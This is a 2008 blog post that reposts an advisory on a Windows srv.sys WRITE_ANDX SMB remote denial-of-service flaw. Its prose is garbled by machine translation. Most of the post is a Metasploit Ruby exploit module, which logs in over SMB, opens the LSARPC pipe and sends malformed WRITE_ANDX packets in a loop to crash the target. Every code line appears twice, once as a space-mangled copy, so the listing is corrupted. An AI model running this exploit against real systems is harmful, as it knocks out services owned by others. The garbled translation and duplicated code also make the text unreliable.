CodeKicks.com
Focus on Microsoft Technologies - Tutorials, Articles, Code Samples.

Thursday, September 18, 2008

Microsoft Windows WRITE_ANDX SMB deal with remote denial

image Microsoft Windows is a commercial operating system. Microsoft Windows srv.sys drive WRITE_ANDX SMB to deal with deformities, problems, remote attacker could use loopholes in the system denial of service attacks.
srv.sys and npfs.sys drive in dealing with special WRITE_ANDX SMB Construction of the message when problems can lead to denial of service attacks trigger core. Long-range attacks can not in the target machines have legitimate verification provisions on the use of this loophole. To the success of the attack, an attacker can be as long as the remote WRITE_ANDX message sent to the use of well-known channels as the interface to the endpoint. These interfaces in the Windows platform allows NULL conversation, the vista can be adopted? \ LSARPC? Successful use.

Reference http://www.securityfocus.com/archive/1/496354

SEBUG safety recommendations:

There is no solution provides: http://www.microsoft.com/windows/default.mspx

Testing methods:

[www.sebug.net]
The following procedures (methods) may carry offensive, the only security research and teaching purposes, own risk!

 require 'msf/core' require 'msf / core' 
module Msf module Msf
module Exploits module Exploits
module Test module Test

class BugTest < Msf::Exploit::Remote class BugTest <Msf:: Exploit:: Remote

include Exploit::Remote::SMB include Exploit:: Remote:: SMB

def initialize(info = {}) def initialize (info = ())
super(update_info(info, super (update_info (info,
'Name' => 'test exploit', 'Name' => 'test exploit',
'Description' => 'Description' =>
"tests",
'Author' => 'tests', 'Author' => 'tests',
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Version' => '$Revision: 0 $', 'Version' => '$ Revision: 0 $',
'Arch' => 'x86', 'Arch' => 'x86',
'Payload' => 'Payload' =>
{ (
'Space' => 1000 'Space' => 1000
}, )
'Targets' => 'Targets' =>
[
[
'Windows VISTA', 'Windows VISTA',
{ (
'Platform' => 'win' 'Platform' => 'win'
} )
],
],
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end

def subexploit(dlenlow, doffset,fillersize) def subexploit (dlenlow, doffset, fillersize)

print_line("1") print_line ( "1")

datastore['SMBUser']='testuser' datastore [ 'SMBUser'] = 'testuser'
datastore['SMBPass']='testuser' datastore [ 'SMBPass'] =' testuser '
datastore['SMBDomain']='COBAYA' datastore [ 'SMBDomain'] = 'COBAYA'
datastore['SMBName']='COBAYA' datastore [ 'SMBName'] = 'COBAYA'

print_line("2") print_line ( "2")

connect() connect ()

print_line("3") print_line ( "3")

smb_login() smb_login ()

print_line("4") print_line ( "4")

pkt = CONST::SMB_CREATE_PKT.make_struct pkt = CONST:: SMB_CREATE_PKT.make_struct

pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags2'] = 0xc807

pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'MultiplexID'] = simple.client.multiplex_id.to_i
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'TreeID'] = simple.client.last_tree_id.to_i
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'UserID'] = simple.client.auth_user_id.to_i
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'ProcessID'] = simple.client.process_id.to_i

pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX pkt [ 'Payload'] [ 'SMB']. v [ 'Command'] = CONST:: SMB_COM_NT_CREATE_ANDX

pkt['Payload']['SMB'].v['WordCount'] = 24 pkt [ 'Payload'] [ 'SMB']. v [ 'WordCount'] = 24

pkt['Payload'].v['AndX'] = 255 pkt [ 'Payload']. v [ 'AndX'] = 255
pkt['Payload'].v['AndXOffset'] = 0xdede pkt [ 'Payload']. v [ 'AndXOffset'] = 0xdede
pkt['Payload'].v['FileNameLen'] = 14 pkt [ 'Payload']. v [ 'FileNameLen'] = 14
pkt['Payload'].v['CreateFlags'] = 0x16 pkt [ 'Payload']. v [ 'CreateFlags'] = 0x16
pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed pkt [ 'Payload']. v [ 'AccessMask'] = 0x2019f # Maximum Allowed
pkt['Payload'].v['ShareAccess'] = 7 pkt [ 'Payload']. v [ 'ShareAccess'] = 7
pkt['Payload'].v['CreateOptions'] = 0x400040 pkt [ 'Payload']. v [ 'CreateOptions'] = 0x400040
pkt['Payload'].v['Impersonation'] = 2 pkt [ 'Payload']. v [ 'Impersonation'] = 2
pkt['Payload'].v['Disposition'] = 1 pkt [ 'Payload']. v [ 'Disposition'] = 1
pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" pkt [ 'Payload']. v [ 'Payload'] = "\ x00 \ \ \ x00L \ x00S \ x00A \ x00R \ x00P \ x00C" + "\ x00 \ x00"


simple.client.smb_send(pkt.to_s) simple.client.smb_send (pkt.to_s)

print_line("5") print_line ( "5")

ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX) ack = simple.client.smb_recv_parse (CONST:: SMB_COM_NT_CREATE_ANDX)

pkt = CONST::SMB_WRITE_PKT.make_struct pkt = CONST:: SMB_WRITE_PKT.make_struct

data_offset = pkt.to_s.length - 4 data_offset = pkt.to_s.length - 4

print_line("6") print_line ( "6")

filler = Rex::Text.rand_text(fillersize) filler = Rex:: Text.rand_text (fillersize)

print_line("7") print_line ( "7")

pkt['Payload']['SMB'].v['Signature1']=0xcccccccc pkt [ 'Payload'] [ 'SMB']. v [ 'Signature1'] = 0xcccccccc
pkt['Payload']['SMB'].v['Signature2']=0xcccccccc pkt [ 'Payload'] [ 'SMB']. v [ 'Signature2'] = 0xcccccccc
pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'MultiplexID'] = simple.client.multiplex_id.to_i
pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'TreeID'] = simple.client.last_tree_id.to_i
pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'UserID'] = simple.client.auth_user_id.to_i
pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i pkt [ 'Payload'] [ 'SMB']. v [ 'ProcessID'] = simple.client.process_id.to_i
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX pkt [ 'Payload'] [ 'SMB']. v [ 'Command'] = CONST:: SMB_COM_WRITE_ANDX
pkt['Payload']['SMB'].v['Flags1'] = 0x18 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0xc807 pkt [ 'Payload'] [ 'SMB']. v [ 'Flags2'] = 0xc807
pkt['Payload']['SMB'].v['WordCount'] = 14 pkt [ 'Payload'] [ 'SMB']. v [ 'WordCount'] = 14
pkt['Payload'].v['AndX'] = 255 pkt [ 'Payload']. v [ 'AndX'] = 255
pkt['Payload'].v['AndXOffset'] = 0xdede pkt [ 'Payload']. v [ 'AndXOffset'] = 0xdede
pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID'] pkt [ 'Payload']. v [ 'FileID'] = ack [ 'Payload']. v [ 'FileID']
pkt['Payload'].v['Offset'] = 0 pkt [ 'Payload']. v [ 'Offset'] = 0
pkt['Payload'].v['Reserved2'] = -1 pkt [ 'Payload']. v [ 'Reserved2'] = -1
pkt['Payload'].v['WriteMode'] = 8 pkt [ 'Payload']. v [ 'WriteMode'] = 8
pkt['Payload'].v['Remaining'] = fillersize pkt [ 'Payload']. v [ 'Remaining'] = fillersize
pkt['Payload'].v['DataLenHigh'] = 0 pkt [ 'Payload']. v [ 'DataLenHigh'] = 0
pkt['Payload'].v['DataLenLow'] = dlenlow #<================== pkt [ 'Payload']. v [ 'DataLenLow'] = dlenlow #<==================
pkt['Payload'].v['DataOffset'] = doffset #<==== pkt [ 'Payload']. v [ 'DataOffset'] = doffset #<====
pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<==== pkt [ 'Payload']. v [ 'DataOffsetHigh'] = 0xcccccccc #<====
pkt['Payload'].v['ByteCount'] = fillersize#<==== pkt [ 'Payload']. v [ 'ByteCount'] = fillersize #<====
pkt['Payload'].v['Payload'] = filler pkt [ 'Payload']. v [ 'Payload'] = filler

print_line("8") print_line ( "8")

simple.client.smb_send(pkt.to_s) simple.client.smb_send (pkt.to_s)

print_line("9") print_line ( "9")

end

def exploit def exploit

k=72 k = 72
j=0xffff j = 0xffff
while j>10000 while j> 10000
i=0xffff i = 0xffff
while i>10000 while i> 10000
begin
print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}") print_line ( "datalenlow = # (i) dataoffset = # (j) fillersize = # (k)")
subexploit(i,j,k) subexploit (i, j, k)
rescue
print_line("rescue") print_line ( "rescue")
end
i=i-10000 i = i-10000
end
j=j-10000 j = j-10000
end

end

end

end
end
end

Post a Comment

Scott said...

Nice article including code.